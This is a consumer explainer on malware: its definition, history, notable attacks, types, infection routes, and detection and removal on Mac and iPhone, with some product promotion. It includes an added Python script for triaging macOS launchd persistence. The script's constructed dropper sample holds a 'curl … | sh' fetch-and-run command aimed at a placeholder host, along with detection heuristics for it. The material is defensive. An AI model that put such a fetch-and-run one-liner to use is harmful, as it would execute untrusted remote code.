Security

What is malware? Definition, types, detection, and prevention

Dawna Roberts

Feb 26, 2024 · 7 min read


Malware has become the bane of every technology lover’s existence. Not only is it annoying, but it is also very damaging and can lead to severe consequences. These days, anyone who uses a computer or mobile device should learn all about malware, including how it works, what a malware infection looks like, and how to protect themselves. 

Continue reading to learn about malware. You’ll also learn some professional tips on how to rid your devices of malicious threats and prevent future infections.

What is malware?

Malware (short for malicious software) is any program written to steal data, damage systems or networks, give an attacker control of a device, or hold information hostage for money. It is written and distributed by cybercriminals. Common families include adware, spyware, ransomware, viruses, worms, and trojans.

Why is malware dangerous?

Malware is dangerous because it disrupts our digital lives, destroys data, compromises hardware/software, and increases our vulnerability to other threats. Anytime your device is infected, it could expose your most personal information or sensitive secrets.

What does malware do?

Some malware spies on you, copying passwords and account information. Other types display pop-up ads. Still others destroy files or encrypt them and demand payment for the key. And while some malware only runs if a user opens or installs it, other types are self-replicating and can spread across a network in minutes without anyone clicking anything.

The evolution of malware

Malware is a blanket term that covers many kinds of hostile software. The earliest example is usually given as Creeper, an experimental self-replicating program from 1971 that moved between machines on ARPANET, the US research network that preceded the internet. Creeper did no damage, but it demonstrated the idea that code could propagate on its own.

The 1980s saw many firsts: the first Apple and PC viruses, the Morris worm of 1988, which knocked a large share of the then-small internet offline, and in 1989 the AIDS Trojan, the first ransomware, which scrambled file names and demanded payment to restore access. The late 1990s and early 2000s brought the mass-mailing worms that spread by email as soon as the attachment was opened. 

Since then, malware has grown into a professional criminal industry: thousands of families, many sold or rented as a service, with techniques that change as fast as defenders adapt to them. Keeping up is a full-time job even for security teams.

What is a malware attack?

Digital attacks that use malware — meaning the attacker uses a type of software to carry out the attack — are extremely common. Malware attacks can vary, but the overall objective is typically financial gain. In other cases, the goal might be the destruction or theft of data to be used in identity theft. 

Real-world cases of malware attacks

We have seen many real-world cases of malware affecting thousands, if not millions, of users. Some extreme cases include the following.

ILOVEYOU worm

In May 2000, the ILOVEYOU worm spread by email as a fake love letter with a VBScript attachment. Opening the attachment infected the machine and mailed a copy to every contact in the victim's address book. It reached tens of millions of computers (estimates run above 45 million), and damage and cleanup estimates run into the billions of dollars.

WannaCry ransomware

In May 2017, WannaCry ransomware infected more than 230,000 computers in over 150 countries in a single day. It spread on its own by exploiting a Windows SMBv1 vulnerability (MS17-010) that Microsoft had patched two months earlier, so the machines that fell were the ones nobody had updated. It remains one of the costliest attacks in history, with losses estimated at around $4 billion.

Emotet trojan

The US Cybersecurity and Infrastructure Security Agency (CISA), part of the Department of Homeland Security, has described the Emotet trojan as among the most costly and destructive malware affecting government networks. Emotet began as a banking trojan that stole financial credentials and evolved into a delivery platform: once on a machine, it installed other criminal groups' malware and used the victim's mailbox to send further spam and phishing, with remediation costing up to $1 million per incident. 

Types of malware

Each type of malware works slightly differently and is used for a specific purpose. The following are the most common types:

  • Virus: A virus attaches itself to another program or file and runs when that host runs, copying itself into further files and often corrupting data or the operating system along the way. 
  • Worm: A worm is a stand-alone program that spreads across networks without user intervention, usually by exploiting a vulnerability in a network service, consuming bandwidth and system resources as it goes.
  • Ransomware: Ransomware encrypts data (and often steals a copy first) and holds it hostage until the owner pays for the decryption key.
  • Trojan: A trojan poses as legitimate software to get installed, then runs in the background stealing data, installing other malware, or giving the attacker remote control. 
  • Spyware: Spyware records your online activity and reports it back to a server controlled by the attacker, often to collect data for identity theft. 
  • Adware: Adware injects or displays unwanted ads and tries to get the user to click on them, sometimes leading to further infections.
  • Keylogger: A keylogger records keystrokes, usually to capture login credentials, banking details, or card numbers. 
  • Backdoor: A backdoor is a hidden way back into a system that lets the attacker return at will, bypassing normal authentication. Backdoors are usually installed alongside other malware. 
  • Botnet: A botnet is a network of infected devices under one attacker's remote control, rented out or used for distributed denial-of-service attacks, spam, and credential-stuffing campaigns. 

Common malware infection methods

Threat actors have many infection methods at their disposal. Most infections, however, still begin with a user action: opening an attachment, clicking a link, or running an installer from the wrong place. That means many of them are avoidable if you follow cybersecurity best practices.

Phishing emails

The most common route is a phishing email that either carries a malicious attachment (a document with macros, a disguised script, an installer) or links to a page that downloads one or harvests credentials. Opening the attachment or running the download is the moment the device becomes infected.

Fake websites

Two things hide behind this heading. Legitimate sites can be compromised to serve exploit code or malicious downloads, a so-called drive-by attack, so even a trusted address is not a guarantee. Attackers also build lookalike sites (fake download pages, fake login pages, malicious search ads) that are hard to tell from the real thing and trick you into installing their software or handing over your password. 

Man-in-the-middle attacks

In a man-in-the-middle attack, an attacker positions themselves between you and the service you are talking to so they can read or alter the traffic, for example swapping a legitimate download for a malicious one. This is easiest on unsecured public Wi-Fi, where anyone on the network can see unencrypted traffic. HTTPS protects most of what you do today, but connections that fall back to plain HTTP are still exposed, so treat open networks with caution and use a VPN on them for an extra layer of protection.

Downloading unsafe files

Downloading software or files from untrusted websites is never a good idea. Files from unverified third parties, including cracked apps and "free" versions of paid software, are a favourite carrier for trojans. Download from the developer's own site or the official app store, and when a publisher posts a checksum or signature for a download, check it before you open the file. 

How to detect malware

As damaging as malicious software is, if you are diligent, you can detect and remove it early before suffering the consequences. Here are some ways to detect malware:

  • Run malware scans often using reputable antivirus/antimalware software, and keep its definitions up to date.
  • Look for unfamiliar files and, more importantly, unfamiliar startup items: on a Mac, check Login Items in System Settings and the LaunchAgents and LaunchDaemons folders, since anything that survives a reboot has to register itself somewhere.
  • Regularly check your system settings (DNS servers, proxies, installed profiles, browser extensions and search engine) to make sure they are as you left them. 
  • Review the activity on your online accounts each month, looking for logins or changes you don't recognize. 
  • Check your router logs for traffic at times you weren't using the device, or to destinations you don't recognize. 
A screenshot of the macOS Activity Monitor.
Mac and macOS are trademarks of Apple Inc.

Possible signs of malware

Some possible malware symptoms include the following: 

  • Computer or device suffering from slowdown
  • Constant pop-ups
  • Hard drive filling up unexpectedly
  • Router logs showing excessive internet activity
  • BSOD (blue screen of death)
  • Suspicious changes to settings
  • Antivirus software turned off or not working 

How to check for malware on iPhone

Although malware on an iPhone is rare, it does happen, most often on jailbroken devices or through malicious configuration profiles and sideloaded apps. Check for apps you don't recognize, unexpected profiles under Settings > General > VPN & Device Management, and unusual data usage or battery drain. Note that because iOS sandboxes every app, a third-party security app cannot scan other apps' files the way a Mac antivirus can; it can mainly check for a jailbreak, malicious network connections and risky settings, so an unexplained problem on iOS is more likely solved by updating iOS, removing unknown profiles and, if needed, restoring the device. 

How to find malware on Mac

Macs have built-in protections (Gatekeeper, XProtect and notarization), but infections still happen, usually via something the user was tricked into installing. The most reliable way to find malware is a reputable antivirus program built to detect and remove Mac threats. Alongside that, open Activity Monitor and look at processes you don't recognize that are consuming CPU, memory or network bandwidth, and check what is set to start automatically: Login Items in System Settings and the LaunchAgents and LaunchDaemons folders in your user Library and in /Library. 
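Both the detection checklist above and this section come down to the same question: what is set to run on this Mac without me starting it? Here is an added Python example (not code from the original article or from any Moonlock product) that reads the launchd plists in the standard LaunchAgents and LaunchDaemons folders, extracts the program each one runs, and flags entries that point at temporary or hidden paths, run through a shell or script interpreter (the `sh -c "curl … | sh"` dropper pattern), are missing, or fail Apple's `codesign` verification. The flagging rules are heuristics of ours, not an Apple list; the two sample plists are constructed for the demonstration, and the signature check is skipped on systems without `codesign`.

```python
"""Triage launchd persistence on a Mac.

Added example, not taken from the original article. Malware that survives a
reboot usually registers a LaunchAgent or LaunchDaemon, so this script reads
those plists and flags the ones worth a second look. The flagging rules are
our own heuristics; the signature check uses Apple's real `codesign` tool when
it is present and is skipped elsewhere.
"""
from __future__ import annotations

import os
import plistlib
import shutil
import subprocess

LAUNCHD_DIRS = ("~/Library/LaunchAgents", "/Library/LaunchAgents", "/Library/LaunchDaemons")
SUSPICIOUS_PREFIXES = ("/tmp/", "/private/tmp/", "/var/tmp/", "/Users/Shared/")
INTERPRETERS = {"sh", "bash", "zsh", "osascript", "python", "python3", "perl", "curl"}


def program_from_plist(data: bytes) -> tuple[str | None, list[str]]:
    """Return (executable, argument list) from a launchd plist.

    launchd accepts either a `Program` key or `ProgramArguments`, whose
    first element is the executable.
    """
    info = plistlib.loads(data)
    args = [str(a) for a in info.get("ProgramArguments", [])]
    program = str(info["Program"]) if "Program" in info else (args[0] if args else None)
    return program, args


def lexical_flags(program: str | None, args: list[str]) -> list[str]:
    """Flags that need no filesystem access, so they also work on a copied plist."""
    if program is None:
        return ["no-program"]
    flags: list[str] = []
    path = os.path.expanduser(program)
    if path.startswith(SUSPICIOUS_PREFIXES):
        flags.append("temp-location")
    # a hidden directory anywhere above the binary, e.g. ~/Library/.helper/agent
    if any(p.startswith(".") for p in path.split(os.sep)[:-1] if p not in (".", "..")):
        flags.append("hidden-directory")
    if os.path.basename(path) in INTERPRETERS:
        flags.append("interpreter")
        # `sh -c "curl … | sh"` one-liners are a classic dropper pattern
        if any("curl" in a or "http" in a for a in args[1:]):
            flags.append("downloads-and-runs")
    return flags


def signature_status(path: str) -> str:
    """'valid', 'invalid', 'unsigned', or 'unknown' when codesign is unavailable."""
    if shutil.which("codesign") is None:
        return "unknown"
    proc = subprocess.run(["codesign", "--verify", "--strict", path],
                          capture_output=True, text=True)
    if proc.returncode == 0:
        return "valid"
    return "unsigned" if "not signed" in proc.stderr else "invalid"


def triage(dirs=LAUNCHD_DIRS) -> list[dict]:
    """Walk the launchd directories and return one record per plist."""
    findings = []
    for d in dirs:
        d = os.path.expanduser(d)
        if not os.path.isdir(d):
            continue
        for name in sorted(os.listdir(d)):
            if not name.endswith(".plist"):
                continue
            plist_path = os.path.join(d, name)
            try:
                with open(plist_path, "rb") as f:
                    program, args = program_from_plist(f.read())
            except Exception:  # an unreadable or malformed plist is itself worth a look
                findings.append({"plist": plist_path, "program": None, "flags": ["unparseable"]})
                continue
            flags = lexical_flags(program, args)
            if program is not None:
                path = os.path.expanduser(program)
                if not os.path.exists(path):
                    flags.append("missing-binary")
                elif signature_status(path) in ("unsigned", "invalid"):
                    flags.append("bad-signature")
            findings.append({"plist": plist_path, "program": program, "flags": flags})
    return findings


# Constructed sample plists for the demonstration; not taken from any real infection.
BENIGN_PLIST = plistlib.dumps({
    "Label": "com.example.updater",
    "ProgramArguments": ["/Applications/Example.app/Contents/MacOS/Updater", "--check"],
    "RunAtLoad": True,
})
DROPPER_PLIST = plistlib.dumps({
    "Label": "com.apple.helper",  # impersonating an Apple-looking label is common
    "ProgramArguments": ["/bin/sh", "-c", "curl -fsSL http://example.invalid/x | sh"],
    "RunAtLoad": True,
    "KeepAlive": True,
})

if __name__ == "__main__":
    for record in triage():
        marker = "!!" if record["flags"] else "  "
        print(marker, record["plist"], record["program"], record["flags"])
```

Run it as the user whose account you are checking, and read the `!!` lines against what you actually installed: a flagged item from software you recognize is a false positive, an unsigned binary in a hidden folder that you never installed is not. Once you have confirmed an entry is malicious, unload it with `launchctl bootout gui/$(id -u) <path-to-plist>` (or `sudo launchctl bootout system <path-to-plist>` for a LaunchDaemon), then delete the plist and the binary it points to, and run a full antivirus scan afterwards, since a persistence entry is rarely the only component.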

How to remove malware

To get rid of malware, you must follow the instructions for your specific device, as the preferred method will vary depending on the device.

To remove malware on a Mac, follow these steps: 

  • Disconnect your Mac from the internet.
  • Reboot your Mac in Safe Mode.
  • Check the Activity Monitor for programs running in the background.
  • Run your antivirus software to find and remove the malware.
  • Remove any extensions from your internet browser and restore your settings.
  • Clear all caches.

Sometimes, the best way to thoroughly remove all malware is to factory reset the device or restore it from a safe backup. 

To remove malware from your Mac using MacPaw’s CleanMyMac X: 

  1. Open CleanMyMac X.
  2. On the left side, under the Smart Scan menu, choose Malware Removal.
  3. Use the Configure button to set how deep and how quickly you want to scan.
  4. The software will automatically detect and remove any malware found.
  5. Click Review Details to see what was found and removed.

Moonlock’s expert tips to prevent malware infection

Preventing a malware attack is much easier than cleaning up after one. Here are a few expert tips to help you prevent infections on all your devices:

  • Always keep your computer and devices updated with the latest security patches.
  • Never download apps or files from an untrusted source.
  • Don't click links or open attachments in unexpected emails or text messages; go to the site directly instead, even when the message looks like it came from your bank or a colleague.
  • Never respond to pop-up messages or urgent emails pressuring you to visit a specific website.
  • Install good antivirus software on all your devices and run deep scans often.
  • Turn on multi-factor authentication (MFA, also called 2FA) wherever it is offered, so a stolen password alone is not enough to get into your accounts.
  • Never share your login credentials with anyone. 
  • Use a VPN like ClearVPN for additional protection. 
  • Educate yourself on all the possible threats and defend yourself with cybersecurity best practices. 

Malware is no minor annoyance. It is a dangerous threat to your digital security and should be treated as such. Fortunately, you can use the methods and safeguards above to keep all your devices clean and running smoothly. 

This is an independent publication, and it has not been authorized, sponsored, or otherwise approved by Apple Inc. iPhone, Mac, iOS, and macOS are trademarks of Apple Inc.

Dawna Roberts
Dawna has spent her entire career in web dev, cybersecurity, and IT. Her work has been featured on Forbes, Adobe, Airtable, Backblaze, Cyberleaf, Lifewire, and other online publications for the past ten years.